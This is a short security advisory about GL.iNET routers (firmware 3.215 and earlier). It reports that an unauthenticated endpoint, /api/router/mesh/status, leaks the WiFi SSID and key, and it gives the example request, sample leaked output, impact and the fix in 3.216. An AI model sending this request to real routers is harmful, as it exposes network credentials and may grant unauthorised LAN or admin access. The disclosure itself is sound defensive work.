Overview - An API endpoint for all GL.iNET devices reveals information about the WiFi configuration, including SSID and key. This endpoint can be accessed without any sort of authentication (although the 4.x firmware documentation claims authentication is required). Affects versions <= 3.215. Example request and response below:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
POST /api/router/mesh/status HTTP/1.1 Host: 192.168.8.1 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 4
mac=
HTTP/1.1 200 OK Content-Type: application/json Content-Length: 143 Connection: close Date: Thu, 29 Dec 2022 21:51:13 GMT Server: lighttpd/1.4.48
Description - The endpoint /api/router/mesh/status is not listed in the front-end of the web GUI for all GL.iNET devices
Steps to reproduce - run the Proof of Concept in the PoC section below using python3 exploit.py <domain/IP>, such as python3 exploit.py 192.168.8.1. Information will be returned such as {'del': '0', 'led': '1', 'led_sync': '0', 'disabled': '2G', 'wifi_sync': '0', 'ssid': 'GL-XE300-343', 'key': 'goodlife', 'encryption': 'psk2', 'version': '3.215', 'code': 0}
Impact
Since this exploit isn’t very useful in default configurations for GL.iNET devices, a section on impact is needed. By default (on the device I’ve looked at), firewall rules block anything coming from the WAN side, meaning the only way to access the Web GUI is to already be on the LAN, which means the SSID key is already known.
However, this exploit is still relevant in non-standard configurations, such as ones where access to the Web GUI is enabled without having to be on the LAN (such as opening up the WAN firewall). This may allow an attacker to connect to the internal LAN.
In addition, the SSID key may be related to (or the same as) the admin password for the Web GUI. In this case, sending a simple request would give you admin access to the router.
Note that a search on Shodan gives over 1000 results, which means that (as of January 2023) there are at least 1000 vulnerable GL.iNET routers available from anyone around the world, with many more in other scenarios.
Fix
This was fixed in version 3.216 by removing the /api/router/mesh/status endpoint from the list of unauthenticated endpoints.